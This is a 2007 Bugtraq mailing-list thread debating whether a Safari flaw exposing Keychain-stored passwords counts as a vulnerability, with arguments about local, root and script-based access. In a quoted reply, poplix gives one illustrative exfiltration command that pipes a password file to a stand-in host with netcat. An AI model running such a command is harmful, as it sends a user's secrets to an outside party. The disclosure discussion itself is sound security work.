Message-Id: <63902D0E-C08F-4DD6-88EB-768FC322C65C@digitalmunition.com>
Date: Fri, 18 May 2007 13:13:53 -0400
From: "Kevin Finisterre (lists)" <kf_lists@...italmunition.com>
To: poplix <poplix@...uasia.org>
Cc: bugtraq@...urityfocus.com
Subject: Re: Apple Safari on MacOSX may reveal user's saved passwords
Make this javascript for Safari show me the saved key for another
application (Like a stored WEP key) and I'll be impressed.
-KF
On May 18, 2007, at 9:23 AM, poplix wrote:
> On 17 May 2007, at 7:50 PM, graham.coles@...-logic-group.com wrote:
>
>> It is also why I don't leave my machine logged in and accessible to other
>> users, which appears to be the whole basis of this 'vulnerability'.
>
> This is NOT the basis of the vulnerability. The point is that
> normally malicious applications running as non-root are not
> able to read keychained passwords.
> In this case, to steal passwords it is sufficient to entice the victim
> to execute a malicious script, which normally is not enough since
> keychain refuses access to untrusted applications.
> This issue exposes keychained passwords as if those were saved in a text
> file: an inexperienced user can lose his password by executing an
> untrusted malicious shell script (i.e. "cat /home/pop/pass | nc
> steal.com 666")
>
>>
>> The whole concept of the keychain, however, is to restrict access to its
>> contents to the owner. If you can happily log in as the owner, then you
>> have everything they can access, INCLUDING the keychain. If they can't do
>> this, you just have some encrypted data. You don't HAVE to store web
>> passwords, of course.
>
> Keychain asks for a password when the owner wants to see his data, and
> having access to a computer doesn't mean that you have the login
> password too.
>
>> If you are sitting at the machine of a person who has left it logged in
>> and they use this feature, then whatever web browser you are using will
>> believe you are that person and provide access to the website
>> automatically--you don't need to see the password to use it.
>
> And what if you gain 5 minutes of access to a laptop in the middle
> of the desert where an internet connection is missing . . .
>
>>
>> I'd like to know what Apple were supposed to do to fix this?
>
> I think it's sufficient to untrust the injected code....
>
>>
>> It is, after all, YOUR keychain with YOUR passwords that YOU want
>> applications to recover when YOU are logged in. Why shouldn't YOU be able
>> to access it. If you don't want to use it don't, but if someone has to be
>> logged in as you to read it, that sounds about right.
>
> Right?? It's like having passwords saved in a text file and running 'chmod
> 700' on it.
>
>>
>>>> Someone has *ROOT* access to your system REMOTELY over ssh and you're
>>>> worried that they might be able to retrieve a password from your
>>>> keychain.
>
> Rooting a computer is really not the point; it's quite obvious that
> "rooted comp" => "TOTAL compromise".
>
> Let me ask a question: what if Safari made the loaded password part
> of the HTML so it's shown when clicking "view page source" ..??
> Should it be considered a vulnerability??
>
>
> cheers,
> -poplix
>
>>
>>> Yes, it would be annoying if someone rooted my laptop. It would be a
>>> lot more annoying if they not only rooted my laptop but also cleaned out
>>> my bank account via my browser.
>>
>> 'Annoying' is the understatement of the millennium.
>>
>> As far as root access goes, see my comments above regarding key loggers?
>>
>> With root access they will have your gpg file, they will know what
>> processes are running (they will know when you run gpg) and they can
>> capture your keystrokes. Is this then a vulnerability of gpg? So much for
>> keeping your online banking safe. Even if you memorize the passwords, they
>> can still see your keypresses and therefore empty your bank account.
>>
>> If someone roots your machine, security is non-existent and trust beyond
>> repair. Don't trivialize this by comparing it to a 'might be able to see
>> your web passwords' issue, this is disaster incarnate and game over all
>> rolled into one!
>
>>
>>> It *is* somewhat disturbing that root can so trivially interfere with
>>> the guts of someone else's processes. Normally, root has to do a lot of
>>> work to do that.
>>
>> With great power comes great responsibility, which is precisely why Macs
>> have the root login disabled and require a user designated as
>> 'Administrator' to authenticate themselves whenever system files are
>> modified or installed. Other users are created as non-administrator and
>> remote login is blocked by the firewall. The chances of anyone actually
>> logging in remotely as root on a normal Mac are zero as you, while
>> administrator, would have to specifically enable all of this. This is why
>> Apple warn you not to do it.
>>
>>>>> a different non-root user on the console can do it too
>>>> Which again restricts this vulnerability (as previously mentioned) to an
>>>> attacker who happens to be sitting in front of your machine(!)
>>
>>> Did you read the bit where I speculated about setuid applications?
>>
>> Yes, but again if you can get this far you either have the person's
>> identity or root access (bad or hopeless situation respectively). Why
>> worry incessantly about things that you stored in the keychain being
>> accessed when someone can access everything you own.
>>
>> Should the keychain refuse to divulge its contents to a person
>> authenticated as the owner?
>>
>> Is the answer to remove the keychain and watch as people revert to storing
>> their passwords unencrypted in stickies, or text files on their desktop?
>>
>> You normally have to come up with a feasible attack vector for something
>> to be a vulnerability, this seems far too early to be notifying the
>> vendor.
>>
>> Saving passwords on any web browser is a lousy idea from a security
>> perspective. However, people don't like security, they like convenience.
>> The only real fix here is perhaps a disclaimer message advising people not
>> to store important passwords for websites in the browser in the first
>> place. But let's face reality, even if they did, would it stop people
>> doing it?
>>
>
>>> --
>>> David Cantrell
>>
>> --
>> Graham Coles
>>
>>
>>
>> The Logic Group Enterprises Limited
>> Logic House, Waterfront Business Park, Fleet Road, Fleet,
>> Hampshire, GU51 3SB, UK
>> Registered in England. Registered No. 2609323
>